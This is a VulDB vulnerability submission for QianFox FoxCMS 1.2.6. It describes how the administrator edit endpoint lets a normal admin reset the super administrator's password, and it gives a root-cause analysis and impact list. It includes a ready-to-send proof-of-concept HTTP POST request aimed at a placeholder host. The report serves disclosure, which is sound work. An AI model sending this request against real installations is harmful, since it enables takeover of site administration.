Submit #818343: QianFox FoxCMS 1.2.6 Improper Privilege Managementinfo

TitelQianFox FoxCMS 1.2.6 Improper Privilege Management
Beschreibung## Vulnerability Title Logic Flaw: Arbitrary Administrator Password Modification --- ## Vulnerability Type Improper Privilege Management / Privilege Escalation / Unauthorized Administrator Password Modification **CWE:** ```text CWE-269: Improper Privilege Management ``` --- ## Vulnerability Location ```text app\admin\controller\Admin.php:edit() ``` --- ## Vulnerability Description The backend administrator edit function `Admin.php:edit()` contains an improper privilege management vulnerability. Although the method restricts changing the status of the administrator account with `id == 1`, it does not properly verify whether the currently logged-in administrator has permission to modify the target administrator account. As a result, a normal administrator can craft a request and modify other administrator accounts, including the super administrator account. By setting the target `id` to the super administrator ID and submitting a new password, the attacker can reset the super administrator’s password. This is a typical backend privilege escalation vulnerability that may allow a low-privileged administrator to take over the entire admin panel. --- ## Root Cause Analysis The `edit()` method has the following security issues: 1. It only restricts status modification for `id == 1`; 2. It does not verify whether the current administrator can edit the target administrator; 3. It does not prevent normal administrators from modifying other administrators; 4. It does not prevent normal administrators from modifying the super administrator; 5. It does not apply permission checks to sensitive fields, such as: - `password` - `group_id` - `status` - `username` 6. It lacks server-side object-level authorization checks. Therefore, a normal administrator can modify the `id` parameter in the request and edit arbitrary administrator accounts. --- ## Affected Endpoint ```http POST /admin9423.php/Admin/edit ``` Affected feature: ```text Backend administrator edit function ``` Affected accounts: ```text All administrator accounts, including the super administrator account ``` --- ## Proof of Concept Log in with a normal administrator account and obtain a valid session cookie. Then send the following request and set `id=1`, which represents the super administrator account. ```http POST /admin9423.php/Admin/edit HTTP/1.1 Host: target.com Cookie: PHPSESSID=xxx Content-Type: application/x-www-form-urlencoded id=1&username=admin&password=Abc123456&group_id=1&nickname=%E9%BB%94%E7%8B%90%E7%A7%91%E6%8A%80&phone=4008883116&avatar=%2Fuploads%2Ffiles%2F20230311%2Fuser.jpg ``` --- ## Result <img width="1224" height="754" alt="Image" src="https://github.com/user-attachments/assets/c4cdea36-fe41-4d34-9c19-23be6276cfee" /> After the request is submitted successfully, the password of the super administrator account is changed to: ```text Abc123456 ``` The attacker can then log in to the backend using the super administrator account and the new password, confirming that a normal administrator can modify the super administrator’s password. --- ## Impact Successful exploitation may lead to: 1. Modification of arbitrary administrator passwords; 2. Resetting the super administrator password; 3. Complete takeover of the super administrator account; 4. Modification of system configuration and business data; 5. Creation of new high-privileged administrator accounts; 6. Deletion or tampering with critical backend data; 7. Further compromise of the server if combined with other backend functions such as file upload or template editing. --- ## Severity Recommended severity: **High / Critical** Reasons: - A normal administrator can take over the super administrator account; - The vulnerability affects the core privilege management mechanism; - Exploitation requires only a low-privileged administrator account; - Successful exploitation may lead to full system compromise. ---
Quelle⚠️ https://github.com/QianFox/FoxCMS/issues/3
Benutzer
 lzihan (UID 97871)
Einreichung03.05.2026 06:35 (vor 1 Monat)
Moderieren26.05.2026 18:23 (23 days later)
StatusAkzeptiert
VulDB Eintrag365682 [QianFox FoxCMS bis 1.2.6 Admin.php edit erweiterte Rechte]
Punkte20

ZurückÜbersichtWeiter

Do you know our Splunk app?

Download it now for free!